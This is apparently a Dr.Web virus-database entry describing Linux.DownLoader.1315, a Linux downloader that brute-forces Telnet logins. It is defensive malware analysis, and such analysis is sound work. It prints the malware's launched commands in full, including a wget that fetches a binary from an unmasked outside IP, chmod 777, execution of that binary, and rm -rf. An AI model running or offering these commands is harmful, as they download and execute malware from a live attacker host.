JavaScript support is required for our site to be fully operational in your browser.
Linux.DownLoader.1315
Added to the Dr.Web virus database:
2019-08-08
Virus description added:
2019-08-08
Technical Information
Malicious functions:
Removes itself
Launches itself as a daemon
Launches processes:
sh -c wget http://34.67.138.200/dark_bins/dark.mpsl; chmod 777 *; ./dark.mpsl wget.loader.mpsl
wget http://34.67.138.200/dark_bins/dark.mpsl
chmod 777 dark.mpsl run.sh stdout.log
./dark.mpsl wget.loader.mpsl
sh -c rm -rf hmpsl
rm -rf hmpsl
Performs operations with the file system:
Modifies file access rights:
/root/dark.mpsl
/root/run.sh
Creates or modifies files:
Deletes files:
Network activity:
Establishes connection:
8.#.8.8:53
34.##.138.200:1791
Attacks using a special dictionary (brute-force technique) via the Telnet protocol.
HTTP GET requests:
34.##.###.200/dark_bins/dark.mpsl
Sends data to the following servers:
34.##.138.200:1791
67.###.48.237:23
10#.#21.5.97:23
16#.##2.139.153:23
Receives data from the following servers:
Curing recommendations
Linux
Free trial
One month (no registration) or three months (registration and renewal discount)
By continuing to use this website, you are consenting to Doctor Web’s use of cookies and other technologies related to the collection of visitor statistics. Learn more
OK